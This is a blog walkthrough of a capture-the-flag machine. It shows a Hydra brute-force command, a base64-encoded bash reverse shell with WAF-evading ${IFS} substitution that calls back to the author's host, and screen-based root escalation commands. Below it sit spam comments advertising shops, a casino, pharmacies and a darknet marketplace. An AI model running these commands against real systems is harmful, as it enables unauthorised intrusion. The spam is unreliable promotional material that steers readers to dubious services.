Another Brick in the ****

October 1, 2019 11 Comments

This is gonna be quick and dirty. A more in depth write up will be done when the box goes retired.

Initial nmap scan didn’t reveal anything too helpful. What author of the box wants you to do is some OSINT, which involves Googling his name, which brings you to his Twitter page.

Thus, we can access the administrative login page for this site by updating the end of the url to /centreon

There’s a couple of ways to figure out the credentials here. We can use Hydra to try to brute force the username and password, and this tutorial is great for that: https://bentrobotlabs.wordpress.com/2018/04/02/web-site-login-brute-forcing-with-hydra/ 

hydra -L top-usernames-shortlist.txt -p password1 10.10.10.157 http-post-form "/index.php:useralias=^USER^&password=^PASS^:F=incorrect" -vV -f

Or you can just try a couple of the top usernames and passwords. On this webpage, it’s admin and password1

Once we’re logged in, we hit a bit of a wall. If we read the author’s blog post we see how he did the exploit, and then wrote a custom piece of code to run the exploit, but this box has a WAF setup so it won’t work. So we have to take a more manual approach.

If we go to Exploit-DB we can find this exploit, written by the author: https://www.exploit-db.com/exploits/47069

It doesn’t work right out of the box, though. What’s happening is the line that start the netcat connection has spaces in it, and the WAF is dropping the rest of the packet (using tcpdump will display this). So we need to modify the code in the exploit we download.

We need to modify this line. The best way to do it is the following:

  1. We want a command that looks like this to establish our reverse shell back: bash -c ‘bash -i >& /dev/tcp/10.10.X.X/1339 0>&1’
    1. Keep in mind that’s the IP of my Kali box, and the port netcat will be listening on.
  2. We should encode it for some extra stealth, so let’s use base 64. Go to a encoding website like https://www.base64encode.org and let’s encode it.
  3. We’re gonna want to echo it, decode it, and then pipe it into bash with a command like this: echo <encoded stuff> | base64 -d | bash;
  4. We need to make sure we don’t let the spaces get removed while we’re sending the command, so we need to use ${IFS} anywhere in our command where we would have a space.

Our updated 47069.py file should have this line modified, and yours should be similar:

Remember to setup your netcat listener with whatever port you specified in your encoding (1339 in my case).

And then run your exploit with a command similar to the following (updated with your IP’s, of course): python3 47069.py http://<target IP>/centreon admin password1 <your Kali IP> <your Kali port>

Enumeration

We’re gonna use a handy dandy little script to do some basic enumeration on Linux, and that script is called linux-smart-enumeration. https://github.com/diego-treitos/linux-smart-enumeration

On your Kali box, use the command they give you to pull lse.sh onto your Kali machine: wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh

Our target box isn’t talking to the internet, so we’ll have to manually move the file over to the box. This is how I do it.

  1. Make sure apache2 is running with service apache2 start
  2. Copy the lse.sh to /var/www/html with the following command: cp lse.sh /var/www/html
  3. From your shell on your target machine, navigate to /tmp
  4. Type wget <ip>/lse.sh and that should copy the script onto the target box
  5. Type chmod 777 lse.sh so that you can execute it
  6. Type ./lse.sh to run the script
  7. If asked for the password, just hit Enter
  8. Watch the magic happen

Looking through the results, we see that there is some unusual setuid binaries, specifically this one:

Googling that bad boy with the word “exploit” brings us here: https://www.exploit-db.com/exploits/41154

Now, I’m going to save you the headache of troubleshooting this bitch. Initially, I used WGET and pulled this onto our target machine and tried to run it and got a big middle finger. So, looking at the script it’s divided into three different sections:

The red box is one script, the blue box is another, and then there is everything around it. This is what I had to do.

Take the information in the red box and paste it into a new file using Nano on your Kali box. Call it libhax.c and it should look like this:

Now, do the same with the code in the blue box and call it rootshell.c and it should look like this:

Make sure those two pieces of code are in your /var/www/html directory on your Kali box and then use wget to bring them onto your target machine.

Now, the rest we are going to do manually. In our screen shot above, the code that wasn’t in the red or blue boxes should do this, but it kept fucking up. So we’re going to do it the good old fashioned way.

For the sake of typos (and your own sanity) I can’t recommend enough copying and pasting the commands from this page: https://www.exploit-db.com/raw/41154 but only the commands I outline below. Let’s go:

  1. gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
  2. gcc -o /tmp/rootshell /tmp/rootshell.c
  3. cd /etc
  4. umask 000
  5. screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
  6. screen -ls
  7. /tmp/rootshell

From here, you should be able to type whoami and be on as root.

The root flag is in /root and the user flag is in /home/shelby

11 thoughts on “Another Brick in the ****”

  1. На этом сайте можно ознакомиться с информацией о телешоу “Однажды в сказке”, развитии событий и ключевых персонажах. однажды в сказке смотреть онлайн/a> Здесь представлены интересные материалы о создании шоу, исполнителях ролей и любопытных деталях из-за кулис.

  3. На данном сайте можно заказать фирменные сумки Coach.
    В каталоге представлены различные модели для любых случаев.
    Любая сумка сочетает в дизайне надежность и элегантность.
    Оформите заказ сейчас и получите доставку в минимальные сроки!

  4. На этом сайте у вас есть возможность приобрести виртуальные телефонные номера различных операторов. Эти номера подходят для подтверждения аккаунтов в различных сервисах и приложениях.
    В ассортименте представлены как долговременные, так и одноразовые номера, что можно использовать чтобы принять SMS. Это удобное решение для тех, кто не хочет указывать личный номер в сети.
    купить одноразовый номер
    Оформление заказа очень удобный: выбираете необходимый номер, оплачиваете, и он будет готов к использованию. Оцените услугу уже сегодня!

  5. Спортивная обувь сегодня стали важнейшей частью современного гардероба. Они идеально сочетаются с многими стилями, от уличного до более элегантного. С каждым годом кроссовки приобретают всё большую важность, становясь не только символом комфорта, но и модным аксессуаром. Все мы выбираем их не только для тренировок, но и для ежедневных прогулок. Такое произошло благодаря их удобству и неповторимому дизайну.
    http://www.limblengtheningforum.com/index.php?topic=87093.new#new

  6. На этом ресурсе вы найдете клинику психологического здоровья, которая предлагает профессиональную помощь для людей, страдающих от тревоги и других ментальных расстройств. Эта комплексное лечение для восстановления психического здоровья. Наши опытные психологи готовы помочь вам справиться с психологические барьеры и вернуться к сбалансированной жизни. Опыт наших психологов подтверждена множеством положительных обратной связи. Обратитесь с нами уже сегодня, чтобы начать путь к восстановлению.
    http://leilaoruraltv.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fz%2Fzopiklon%2F

  7. GameAthlon is a popular entertainment platform offering thrilling gameplay for players of all preferences.
    The casino features a diverse collection of slot games, live dealer games, card games, and sportsbook.
    Players have access to smooth navigation, stunning animations, and easy-to-use interfaces on both desktop and smartphones.
    http://www.gameathlon.gr
    GameAthlon prioritizes safe gaming by offering trusted payment methods and reliable RNG systems.
    Reward programs and VIP perks are regularly updated, giving players extra opportunities to win and extend their play.
    The customer support team is ready 24/7, supporting with any inquiries quickly and politely.
    The site is the ideal choice for those looking for an adrenaline rush and big winnings in one safe space.

  8. Exquisite wristwatches have long been a gold standard in horology. Crafted by legendary artisans, they seamlessly blend heritage with innovation.
    Every component embody unmatched workmanship, from precision-engineered calibers to luxurious finishes.
    Investing in a timepiece is more than a way to check the hour. It stands for refined taste and exceptional durability.
    No matter if you love a bold statement piece, Swiss watches provide remarkable beauty that stands the test of time.
    http://forum.lbaci.net/viewtopic.php?t=141723

  9. You can find a vast selection of trusted pharmaceutical products to suit your health requirements.
    Our platform ensures speedy and reliable shipping to your location.
    Every item is sourced from licensed manufacturers so you get authenticity and compliance.
    Feel free to browse our online store and place your order with just a few clicks.
    Need help? Our support team will guide you at any time.
    Prioritize your well-being with reliable e-pharmacy!
    https://www.goodreads.com/review/show/6956394469

  10. Despite the rise of digital timepieces, mechanical watches remain everlasting.
    Many people still appreciate the artistry that goes into classic automatics.
    Compared to modern wearables, that become outdated, classic timepieces remain prestigious through generations.
    https://spacerider.ru/forum/index.php?topic=2176.new#new
    Prestigious watchmakers are always introducing limited-edition traditional watches, confirming that their appeal hasn’t faded.
    To a lot of people, a traditional wristwatch is not just an accessory, but a reflection of timeless elegance.
    Even as high-tech wearables offer convenience, mechanical watches represent an art form that remains unmatched.

  11. BlackSprut – платформа с особыми возможностями
    Платформа BlackSprut удостаивается обсуждения широкой аудитории. Что делает его уникальным?
    Данный ресурс обеспечивает широкие опции для своих пользователей. Оформление сайта отличается простотой, что делает платформу понятной даже для новичков.
    Важно отметить, что данная система обладает уникальными характеристиками, которые делают его особенным на рынке.
    Обсуждая BlackSprut, нельзя не упомянуть, что различные сообщества выражают неоднозначные взгляды. Многие выделяют его удобство, а кто-то оценивают его неоднозначно.
    В целом, BlackSprut остается объектом интереса и удерживает внимание разных слоев интернет-сообщества.
    Обновленный сайт БлэкСпрут – здесь можно найти
    Если нужен обновленный сайт БлэкСпрут, то вы по адресу.
    bs2best
    Сайт часто обновляет адреса, поэтому важно знать обновленный линк.
    Мы следим за актуальными доменами и готовы предоставить новым линком.
    Проверьте рабочую ссылку прямо сейчас!

Leave a Reply

Your email address will not be published. Required fields are marked *